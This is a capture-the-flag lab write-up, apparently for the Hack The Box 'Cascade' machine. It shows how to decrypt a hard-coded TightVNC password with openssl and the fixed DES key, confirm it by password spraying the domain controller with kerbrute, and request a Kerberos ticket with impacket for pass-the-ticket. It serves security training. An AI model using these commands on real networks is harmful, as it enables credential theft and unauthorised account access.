InfoSec LAB

Cascade_VNC

Created: 3 min read

VNC

virtual network computing (vnc) is a graphical desktop-sharing system that uses the remote frame buffer protocol (rfb) to remotely control another computer. It transmits the keyboard and mouse input from one computer to another, relaying the graphical-screen updates, over a network vnc is platform-independent – there are clients and servers for many gui-based operating systems and for java. Multiple clients may connect to a VNC server at the same time. Popular uses for this technology include remote technical support and accessing files on one’s work computer from one’s home computer, or vice versa.

By default, password-based authentication is the standard authentication mechanism used by VNC. The VNC server requires clients to provide the correct password during the connection process. The password is often stored on the server in an encrypted or hashed form to enhance security. The client sends the password (encrypted or hashed) to the server for authentication. If the provided password matches the stored password, the client is granted access to the remote desktop.

in the current context, i found a pre-configured registry set for a tightvnc installation at \\casc-dc1.cascade.local\Data\IT\Temp\s.smith\VNC Install.reg The registry set had an encrypted VNC credential hard-coded in the hexadecimal format.

Decryption

If the password was encrypted using the default encryption key, it can easily be decrypted using the method above:

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ echo "6bcf2a4b6e5aca0f" | xxd -r -p > secret

I had previously already converted the hex-string into a plaintext string and stored it into the secret file

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ cat secret | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008

The decrypted VNC password is sT333ve2

Although I suspect that the password belongs to the s.smith user as the registry file was located within the user’s directory, I will perform a password spray attack to validate it

Password Spray

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ kerbrute passwordspray -d CASCADE.LOCAL --dc casc-dc1.cascade.local users 'sT333ve2'   
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 06/26/23 - Ronnie Flathers @ropnop
 
2023/06/26 08:55:28 >  Using KDC(s):
2023/06/26 08:55:28 >  	casc-dc1.cascade.local:88
 
2023/06/26 08:55:38 >  [+] VALID LOGIN:	 s.smith@CASCADE.LOCAL:sT333ve2
2023/06/26 08:55:48 >  Done! Tested 17 logins (1 successes) in 20.789 seconds

The password is confirmed to belong to the s.smith user

TGT

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-getTGT 'CASCADE.LOCAL/s.smith:sT333ve2' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in s.smith.ccache

TGT generated for the s.smith user. The TGT will allow me to continue the operation with the pass-the-ticket technique

Interactive Graph View

Backlinks